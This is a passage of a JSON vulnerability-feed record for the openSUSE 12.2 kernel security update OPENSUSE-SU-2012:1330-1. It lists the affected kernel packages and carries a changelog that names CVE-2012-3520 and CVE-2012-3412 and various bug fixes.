"packageFilename": "kernel-desktop-base-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-desktop-base", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-devel-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-desktop-devel", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-desktop-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-xen-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-base-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-desktop-base-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-pae-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-pae-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-vanilla", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-base-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-default-base-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-desktop", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-devel-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-debug-devel", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-devel-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-trace-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-extra-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-ec2-extra", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-desktop-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-debug-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-base-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-ec2-base-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-devel-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-desktop-devel-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-pae-base-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-pae-base-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-base-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-debug-base", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-pae-devel-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-pae-devel", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-debugsource-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-desktop-debugsource", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-base-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-ec2-base", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-debugsource-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-vanilla-debugsource", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-base-debuginfo-3.4.11-2.16.1.i586.rpm", "packageName": "kernel-default-base-debuginfo", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-debugsource-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-trace-debugsource", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-base-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-xen-base", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-debugsource-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-debug-debugsource", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-debugsource-3.4.11-2.16.1.i586.rpm", "packageName": "kernel-default-debugsource", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.2", "packageFilename": "kernel-docs-3.4.11-2.16.2.noarch.rpm", "packageName": "kernel-docs", "arch": "noarch", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-debugsource-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-trace-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-xen", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-extra-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-ec2-extra-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-devel-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-xen-devel-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-devel-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-ec2-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-pae-devel-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-pae-devel-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-devel-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-default-devel-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-debugsource-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-ec2-debugsource", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-devel-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-xen-devel-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-base-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-debug-base-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-base-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-ec2-base-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-extra-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-ec2-extra-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-syms-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-syms", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-base-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-trace-base", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-debugsource-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-xen-debugsource", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-base-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-xen-base", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-debuginfo-3.4.11-2.16.1.i586.rpm", "packageName": "kernel-default-debuginfo", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-devel-3.4.11-2.16.1.i586.rpm", "packageName": "kernel-default-devel", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-base-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-trace-base-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-base-3.4.11-2.16.1.i586.rpm", "packageName": "kernel-default-base", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-vanilla-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-pae-base-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-pae-base", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-base-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-default-base", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-trace-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-base-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-ec2-base", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-devel-debuginfo-3.4.11-2.16.1.i586.rpm", "packageName": "kernel-default-devel-debuginfo", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-pae-debugsource-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-pae-debugsource", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-trace", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-devel-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-vanilla-devel-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-ec2", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-base-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-debug-base-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-devel-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-debug-devel-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-vanilla-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-base-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-trace-base", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-source-3.4.11-2.16.1.noarch.rpm", "packageName": "kernel-source", "arch": "noarch", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-desktop", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-base-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-desktop-base", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-debugsource-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-ec2-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-devel-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-vanilla-devel-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-devel-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-debug-devel-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-debug", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-devel-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-vanilla-devel", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-syms-3.4.11-2.16.1.i586.rpm", "packageName": "kernel-syms", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-debugsource-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-vanilla-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-ec2-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-base-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-xen-base-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-pae-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-pae", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-devel-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-ec2-devel-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-devel-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-desktop-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-devel-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-trace-devel-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-xen", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-devel-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-debug-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-devel-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-default-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-devel-3.4.11-2.16.1.noarch.rpm", "packageName": "kernel-devel", "arch": "noarch", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-devel-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-ec2-devel", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-debug-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-debug", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-base-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-debug-base", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-base-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-trace-base-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-base-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-xen-base-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-source-vanilla-3.4.11-2.16.1.noarch.rpm", "packageName": "kernel-source-vanilla", "arch": "noarch", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-ec2-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-trace", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-debug-debugsource-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-debug-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-devel-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-xen-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-ec2", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-debugsource-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-default-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-base-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-desktop-base-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-devel-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-xen-devel", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-devel-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-trace-devel", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-devel-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-trace-devel-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-devel-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-vanilla-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-devel-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-ec2-devel-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-debuginfo-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-default-debuginfo", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-desktop-debugsource-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-desktop-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-vanilla-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-vanilla", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-xen-debugsource-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-xen-debugsource", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-trace-debuginfo-3.4.11-2.16.1.i686.rpm", "packageName": "kernel-trace-debuginfo", "arch": "i686", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-default-3.4.11-2.16.1.i586.rpm", "packageName": "kernel-default", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.2", "packageVersion": "3.4.11-2.16.1", "packageFilename": "kernel-ec2-extra-3.4.11-2.16.1.x86_64.rpm", "packageName": "kernel-ec2-extra", "arch": "x86_64", "operator": "lt"}], "description": "This kernel update to 3.4.11 fixes various bugs and\n security issues.\n\n The changes up to 3.4.11 contain both security and bugfixes\n and are not explicitly listed here.\n\n Following security issues were fixed: CVE-2012-3520: Force\n passing credentials, otherwise local services could be\n fooled to assume requests coming from root.\n\n CVE-2012-3412: Do not allow extreme TSO parameters in the\n sfc driver and tcp stack.\n\n Following non-security bugs were fixed:\n - nbd: clear waiting_queue on shutdown (bnc#778630).\n - NFS: avoid warning from nfs_drop_nlink (bnc#780624).\n - net: do not disable sg for packets requiring no checksum\n (bnc#774859).\n\n - sfc: Fix maximum number of TSO segments and minimum TX\n queue size (bnc#774523 CVE-2012-3412).\n - net: Allow driver to limit number of GSO segments per skb\n (bnc#774523 CVE-2012-3412).\n\n - drm/nouveau: fix booting with plymouth + dumb support\n (bnc#771392).\n\n - memcg: warn on deeper hierarchies with use_hierarchy==0\n (bnc#781134).\n\n - Linux 3.4.11.\n - Update config files.\n - Refresh patches.suse/scsi-error-test-unit-ready-timeout.\n\n - Btrfs: fix tree log remove space corner case (bnc#779432)\n\n - irq_remap: disable IRQ remapping if any IOAPIC lacks an\n IOMMU.\n\n - Linux 3.4.10.\n\n - Linux 3.4.9.\n - kABI: protect struct irq_desc.\n\n - Linux 3.4.8.\n - kABI: sdhci, remove inclusion.\n\n - reiserfs: fix deadlock with nfs racing on create/lookup\n (bnc#762693).\n\n - Properly update Xen patches to 3.4.7.\n - Refresh other Xen patches (bnc#772831).\n\n - config: enable various ARM errata workarounds to improve\n stability\n\n - Import kabi files for 12.2\n\n - rpm/config.sh: Build the KOTD against 12.2\n\n - ASoC: omap: Add missing modules aliases to get sound\n working on omap devices.\n\n - Update config files to fix build\n\n - rt2800: add chipset revision RT5390R support (bnc#772566).\n\n - reiserfs: fix deadlocks with quotas\n\n - ACPI, APEI: Fixup common access width firmware bug\n (bnc#765230).\n\n - i2c/busses: Fix build error if\n CONFIG_I2C_DESIGNWARE_PLATFORM=y and CONFIG_I2C_DESIGN.\n\n - Update ARM configs to match kernel 3.4.7\n\n - Update ARM omap2plus config to match kernel 3.4.7 and add\n Smartreflex support (auto voltage)\n\n - ALSA: hda - Fix mute-LED GPIO initialization for IDT\n codecs (bnc#772923).\n - ALSA: hda - Fix polarity of mute LED on HP Mini 210\n (bnc#772923).\n\n - Linux 3.4.7.\n - Refresh patches.suse/dm-raid45-26-Nov-2009.patch.\n\n - Enable RTL8150 for omap2plus Generic USB Network device\n that also works fine on ARM, so enable it\n\n - update RNDIS_OID_GEN_RNDIS_CONFIG_PARAMETER patch name\n\n - Drivers: hv: Cleanup the guest ID computation.\n\n - hyperv: Add a check for ring_size value.\n - hyperv: Add error handling to rndis_filter_device_add().\n - Drivers: hv: Change the hex constant to a decimal\n constant.\n - hyperv: Add support for setting MAC from within guests.\n - net/hyperv: Use wait_event on outstanding sends during\n device removal.\n - hv: add RNDIS_OID_GEN_RNDIS_CONFIG_PARAMETER.\n\n - Refresh patches.suse/SUSE-bootsplash. Fix wrong vfree()\n (bnc#773406)\n\n", "edition": 1, "reporter": "Suse", "published": "2012-10-12T16:08:23", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "title": "kernel: security and bugfix update (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3520", "CVE-2012-3412"], "modified": "2012-10-12T16:08:23", "id": "OPENSUSE-SU-2012:1330-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-10/msg00005.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}